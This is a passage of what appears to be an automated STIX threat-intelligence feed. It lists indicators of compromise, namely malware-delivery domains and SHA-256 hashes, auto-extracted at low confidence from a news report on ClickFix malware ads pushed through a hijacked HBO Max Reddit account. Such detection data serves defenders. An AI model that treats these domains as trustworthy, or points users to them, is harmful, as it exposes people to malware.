Malware Ads\" (Cyber Security News). Context: sioning-neighborhood domains Domain chatgpt-safepage[.]com; thepullmanfolkestone[.]com; gigappyworld[.]com; microsoftupdater[.]info; gogolfonlin","pattern":"[domain-name:value = 'thepullmanfolkestone.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2e684620-724b-4307-8920-c1d639438591","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: trekmesh15.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: 9[.]com; perchframe15[.]com; canvas-35[.]com; pine63[.]com; trekmesh15[.]com macOS loader-delivery domains Domain weaveridge7[.]com; e","pattern":"[domain-name:value = 'trekmesh15.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9a1d3356-10c9-43ae-9d3b-be97e75bb6c5","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: umapla.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: om AMOS helper and tasking domains Domain loop-lumen[.]com; umapla[.]com; glrack[.]com Fake wallet delivery domains Domain desktop","pattern":"[domain-name:value = 'umapla.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b2cedc86-e77c-4d34-bbe2-6dee047c802f","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: verse-18.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: [.]com; fern-plume[.]com; node-slate[.]com; grove-12[.]com; verse-18[.]com; lakhov[.]com; mpasvw[.]com; ouilov[.]com; aforvm[.]com A","pattern":"[domain-name:value = 'verse-18.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a4b0ddd3-b344-4125-918e-b8186d755f07","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: wantsellonline.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: osoftupdater[.]info; gogolfonline[.]com; heroestales[.]com; wantsellonline[.]com; papartybus[.]com; clveeragent[.]com; congiagent[.]com; s","pattern":"[domain-name:value = 'wantsellonline.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a91de4d6-cf42-4a89-8f97-d91cf0b2a00b","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: weaveridge7.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ]com; trekmesh15[.]com macOS loader-delivery domains Domain weaveridge7[.]com; ember-bridge[.]com; rudder-moss[.]com; wuess[.]com Septe","pattern":"[domain-name:value = 'weaveridge7.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f58c99ad-4e98-44e0-a5a3-3986067ab39d","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: wuess.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: n weaveridge7[.]com; ember-bridge[.]com; rudder-moss[.]com; wuess[.]com September macOS telemetry and delivery domains Domain hou","pattern":"[domain-name:value = 'wuess.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--92d434e6-9069-4151-907a-5730a301134b","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: 06a3d3bdeb33411fba53eed53cf528f3b33fdf5c2a74921d5d98002cb5e2ba1b","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: cb92 SIC MP3/HTA payload and Talos clipper artifact SHA-256 06a3d3bdeb33411fba53eed53cf528f3b33fdf5c2a74921d5d98002cb5e2ba1b; d1690bec25ed5423e86a9ba1ce41ba8d0de91700e0b680291196dd9975","pattern":"[file:hashes.'SHA-256' = '06a3d3bdeb33411fba53eed53cf528f3b33fdf5c2a74921d5d98002cb5e2ba1b']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ccf1bda4-2d4b-4dcf-8680-99d2f77b847a","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: 131a071301006dbed8dbf4d2e08b2914407b7693ab23566bdfee9f39f157aab4","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: b7ef38015342fb8ae11c489fc1a3f01e743123e4222e9291cb474fb75e; 131a071301006dbed8dbf4d2e08b2914407b7693ab23566bdfee9f39f157aab4; ecbbf5c7f1fac026dbaa74e8dac630730b4a49fbbb9fd59c333c48c287","pattern":"[file:hashes.'SHA-256' = '131a071301006dbed8dbf4d2e08b2914407b7693ab23566bdfee9f39f157aab4']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--42a147d3-4484-4bd0-9fd4-6eed524fa678","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: 18c8b79ce68060782e52445a9f38c57e4b6e3f09f625b0465e0a9576e51a7505","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: 3c2ed35a03b84558b8a3cd7b7e47a15914ed819ca2ce99afe32b5a0540; 18c8b79ce68060782e52445a9f38c57e4b6e3f09f625b0465e0a9576e51a7505; 249088420058e50b5e7d1e615a6b9c212e1c341b43fbd8b60cde30d5bd","pattern":"[file:hashes.'SHA-256' = '18c8b79ce68060782e52445a9f38c57e4b6e3f09f625b0465e0a9576e51a7505']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1c0f445e-47a0-4ace-a160-44cddee1e78d","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: 249088420058e50b5e7d1e615a6b9c212e1c341b43fbd8b60cde30d5bd281938","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: 9ce68060782e52445a9f38c57e4b6e3f09f625b0465e0a9576e51a7505; 249088420058e50b5e7d1e615a6b9c212e1c341b43fbd8b60cde30d5bd281938; 9eb96fc1fda13b143a90896793754b6a61942dbf87846895bb9ea8c1e8","pattern":"[file:hashes.'SHA-256' = '249088420058e50b5e7d1e615a6b9c212e1c341b43fbd8b60cde30d5bd281938']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3c8bcb4e-d530-4c7e-a4f9-902fa89548f0","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: 279d04c0cfd700c8bcb9acbed528131d3ffef8e25d12713e8649772739aecb92","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: 2365d0c690db613ff30635970668f5699b65c3842ecdc4f1b695ed13a7; 279d04c0cfd700c8bcb9acbed528131d3ffef8e25d12713e8649772739aecb92 SIC MP3/HTA payload and Talos clipper artifact SHA-256 06a3","pattern":"[file:hashes.'SHA-256' = '279d04c0cfd700c8bcb9acbed528131d3ffef8e25d12713e8649772739aecb92']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--463bcd15-526d-465c-a7f5-c3fc7f9b40c9","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: 3276414afb3c7ce7aa19db5401051ce4ad6968a7cc6bf8384cd6470c92541a24","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: e5bb793da2d5ddfdcf00dd37bd4c7176ea0fb58d4e6bd5c891795dc2f5; 3276414afb3c7ce7aa19db5401051ce4ad6968a7cc6bf8384cd6470c92541a24 InstallFix MP3/HTA, InstallFix /cl and recovered InstallFix","pattern":"[file:hashes.'SHA-256' = '3276414afb3c7ce7aa19db5401051ce4ad6968a7cc6bf8384cd6470c92541a24']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--82376f05-59c9-4723-b1d2-e88ef33b290d","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: 480c65e5bb793da2d5ddfdcf00dd37bd4c7176ea0fb58d4e6bd5c891795dc2f5","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: 83129f6771d186f60379dca30d208374cac45bac75d5459aaf0fabc8ad; 480c65e5bb793da2d5ddfdcf00dd37bd4c7176ea0fb58d4e6bd5c891795dc2f5; 3276414afb3c7ce7aa19db5401051ce4ad6968a7cc6bf8384cd6470c92","pattern":"[file:hashes.'SHA-256' = '480c65e5bb793da2d5ddfdcf00dd37bd4c7176ea0fb58d4e6bd5c891795dc2f5']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--24ab4911-87de-4667-9e60-2678dbc175be","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: 5e8ad983129f6771d186f60379dca30d208374cac45bac75d5459aaf0fabc8ad","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ake Ledger, Trezor and Exodus application artifacts SHA-256 5e8ad983129f6771d186f60379dca30d208374cac45bac75d5459aaf0fabc8ad; 480c65e5bb793da2d5ddfdcf00dd37bd4c7176ea0fb58d4e6bd5c89179","pattern":"[file:hashes.'SHA-256' = '5e8ad983129f6771d186f60379dca30d208374cac45bac75d5459aaf0fabc8ad']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--79766933-f00c-4362-b02a-d8db73369f5d","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: 6759c72365d0c690db613ff30635970668f5699b65c3842ecdc4f1b695ed13a7","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: c218e1aba3fcb Recovered x86 artifact and Amatera PE SHA-256 6759c72365d0c690db613ff30635970668f5699b65c3842ecdc4f1b695ed13a7; 279d04c0cfd700c8bcb9acbed528131d3ffef8e25d12713e8649772739","pattern":"[file:hashes.'SHA-256' = '6759c72365d0c690db613ff30635970668f5699b65c3842ecdc4f1b695ed13a7']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8550ab82-9a3a-456f-9593-e5ad65738da4","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: 93d986f39599df747e4f65484a41d5e5ae7ece345924ea36e4f4ee623ce2f0ae","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: 41ef5d316a1ae8631329349287e6a411 Metadata artifacts SHA-256 93d986f39599df747e4f65484a41d5e5ae7ece345924ea36e4f4ee623ce2f0ae; e6e54a8e8f30cedd8492f515ab95e005478bafb41998c43341fcf3a494","pattern":"[file:hashes.'SHA-256' = '93d986f39599df747e4f65484a41d5e5ae7ece345924ea36e4f4ee623ce2f0ae']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--61786a83-ab19-4776-98b7-ea04a4513772","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: 9eb96fc1fda13b143a90896793754b6a61942dbf87846895bb9ea8c1e849cd96","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: 420058e50b5e7d1e615a6b9c212e1c341b43fbd8b60cde30d5bd281938; 9eb96fc1fda13b143a90896793754b6a61942dbf87846895bb9ea8c1e849cd96 Houston, Pressureulcerlawyer, Lalandscapelighting, Aidevmas","pattern":"[file:hashes.'SHA-256' = '9eb96fc1fda13b143a90896793754b6a61942dbf87846895bb9ea8c1e849cd96']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--66bbb61b-7c1f-469a-882c-d2de3e9aba29","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: a90a93e9776852dac869d4097dba2a4741ef5d316a1ae8631329349287e6a411","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: 711fe132f00d1a10d6f8c0f26c1544b41f57ca9262668dd2c771cc31f7; a90a93e9776852dac869d4097dba2a4741ef5d316a1ae8631329349287e6a411 Metadata artifacts SHA-256 93d986f39599df747e4f65484a41d5e5","pattern":"[file:hashes.'SHA-256' = 'a90a93e9776852dac869d4097dba2a4741ef5d316a1ae8631329349287e6a411']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--64367b91-6cc6-4ea8-bc6a-1f2d29cd4df6","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: d1690bec25ed5423e86a9ba1ce41ba8d0de91700e0b680291196dd9975a8a29c","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: bdeb33411fba53eed53cf528f3b33fdf5c2a74921d5d98002cb5e2ba1b; d1690bec25ed5423e86a9ba1ce41ba8d0de91700e0b680291196dd9975a8a29c; ede6ea506c6221f24618f8a7177f9c2f16b63968f0c34818c45d88f1d0","pattern":"[file:hashes.'SHA-256' = 'd1690bec25ed5423e86a9ba1ce41ba8d0de91700e0b680291196dd9975a8a29c']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d7c2d985-e815-49d2-8766-7ae18639cf0a","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: d4150c1c97f047c6edb14767bf1efa8f9e37d63b124f38f27da4ef52d570aac2","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: 949cfc514f145262136898b009 September macOS artifact SHA-256 d4150c1c97f047c6edb14767bf1efa8f9e37d63b124f38f27da4ef52d570aac2 AccountsHelper artifact SHA-256 f71d72711fe132f00d1a10d6f8c","pattern":"[file:hashes.'SHA-256' = 'd4150c1c97f047c6edb14767bf1efa8f9e37d63b124f38f27da4ef52d570aac2']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3e98e6ab-2c70-4cb9-bcc3-717559b145f9","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: d4eb6e4cec1e69f3bc94bbe2d743e982863fc8549e49f832846c218e1aba3fcb","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: b13bb21c1ce757db666b6df329724ec2ec493bcae1ba64b4ec2e93a331; d4eb6e4cec1e69f3bc94bbe2d743e982863fc8549e49f832846c218e1aba3fcb Recovered x86 artifact and Amatera PE SHA-256 6759c72365d0c","pattern":"[file:hashes.'SHA-256' = 'd4eb6e4cec1e69f3bc94bbe2d743e982863fc8549e49f832846c218e1aba3fcb']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3e95b799-c042-4d48-b303-5006b996cfc5","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: d95e123c2ed35a03b84558b8a3cd7b7e47a15914ed819ca2ce99afe32b5a0540","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: 506c6221f24618f8a7177f9c2f16b63968f0c34818c45d88f1d0dd03a7; d95e123c2ed35a03b84558b8a3cd7b7e47a15914ed819ca2ce99afe32b5a0540; 18c8b79ce68060782e52445a9f38c57e4b6e3f09f625b0465e0a9576e5","pattern":"[file:hashes.'SHA-256' = 'd95e123c2ed35a03b84558b8a3cd7b7e47a15914ed819ca2ce99afe32b5a0540']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a566a1db-cdb7-4a0e-a173-687fd4da66d7","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: e6e54a8e8f30cedd8492f515ab95e005478bafb41998c43341fcf3a494573d6c","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: f39599df747e4f65484a41d5e5ae7ece345924ea36e4f4ee623ce2f0ae; e6e54a8e8f30cedd8492f515ab95e005478bafb41998c43341fcf3a494573d6c Arkypc loader and helper SHA-256 f8d09bb7ef38015342fb8ae11c","pattern":"[file:hashes.'SHA-256' = 'e6e54a8e8f30cedd8492f515ab95e005478bafb41998c43341fcf3a494573d6c']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9e3ef2c2-31f3-4a75-b69c-d2875561b18d","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: ec9111b13bb21c1ce757db666b6df329724ec2ec493bcae1ba64b4ec2e93a331","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: , InstallFix /cl and recovered InstallFix artifacts SHA-256 ec9111b13bb21c1ce757db666b6df329724ec2ec493bcae1ba64b4ec2e93a331; d4eb6e4cec1e69f3bc94bbe2d743e982863fc8549e49f832846c218e1a","pattern":"[file:hashes.'SHA-256' = 'ec9111b13bb21c1ce757db666b6df329724ec2ec493bcae1ba64b4ec2e93a331']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--18fb894b-9d19-4094-bce6-f52789f131c6","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: ecbbf5c7f1fac026dbaa74e8dac630730b4a49fbbb9fd59c333c48c28768ebfb","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: 1301006dbed8dbf4d2e08b2914407b7693ab23566bdfee9f39f157aab4; ecbbf5c7f1fac026dbaa74e8dac630730b4a49fbbb9fd59c333c48c28768ebfb Fake Ledger, Trezor and Exodus application artifacts SHA-25","pattern":"[file:hashes.'SHA-256' = 'ecbbf5c7f1fac026dbaa74e8dac630730b4a49fbbb9fd59c333c48c28768ebfb']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--61d763e0-7d0a-4d2a-8478-42657ebd87f5","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: ede6ea506c6221f24618f8a7177f9c2f16b63968f0c34818c45d88f1d0dd03a7","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ec25ed5423e86a9ba1ce41ba8d0de91700e0b680291196dd9975a8a29c; ede6ea506c6221f24618f8a7177f9c2f16b63968f0c34818c45d88f1d0dd03a7; d95e123c2ed35a03b84558b8a3cd7b7e47a15914ed819ca2ce99afe32b","pattern":"[file:hashes.'SHA-256' = 'ede6ea506c6221f24618f8a7177f9c2f16b63968f0c34818c45d88f1d0dd03a7']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c0525e5b-f6b0-49b8-89dc-139d9d1b7c26","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: eec09815c3664aa6b3cd370a8b8f566be3b804949cfc514f145262136898b009","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: Selectors for getData() , balanceOf() and setData() SHA-256 eec09815c3664aa6b3cd370a8b8f566be3b804949cfc514f145262136898b009 September macOS artifact SHA-256 d4150c1c97f047c6edb14767bf","pattern":"[file:hashes.'SHA-256' = 'eec09815c3664aa6b3cd370a8b8f566be3b804949cfc514f145262136898b009']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b27663ee-8d92-4d6a-8f71-556bf710f006","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: f71d72711fe132f00d1a10d6f8c0f26c1544b41f57ca9262668dd2c771cc31f7","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: 63b124f38f27da4ef52d570aac2 AccountsHelper artifact SHA-256 f71d72711fe132f00d1a10d6f8c0f26c1544b41f57ca9262668dd2c771cc31f7; a90a93e9776852dac869d4097dba2a4741ef5d316a1ae8631329349287","pattern":"[file:hashes.'SHA-256' = 'f71d72711fe132f00d1a10d6f8c0f26c1544b41f57ca9262668dd2c771cc31f7']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--be8cdb2c-21bb-4917-9cb8-cf198c0aaa8e","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: f8d09bb7ef38015342fb8ae11c489fc1a3f01e743123e4222e9291cb474fb75e","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: b41998c43341fcf3a494573d6c Arkypc loader and helper SHA-256 f8d09bb7ef38015342fb8ae11c489fc1a3f01e743123e4222e9291cb474fb75e; 131a071301006dbed8dbf4d2e08b2914407b7693ab23566bdfee9f39f1","pattern":"[file:hashes.'SHA-256' = 'f8d09bb7ef38015342fb8ae11c489fc1a3f01e743123e4222e9291cb474fb75e']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security 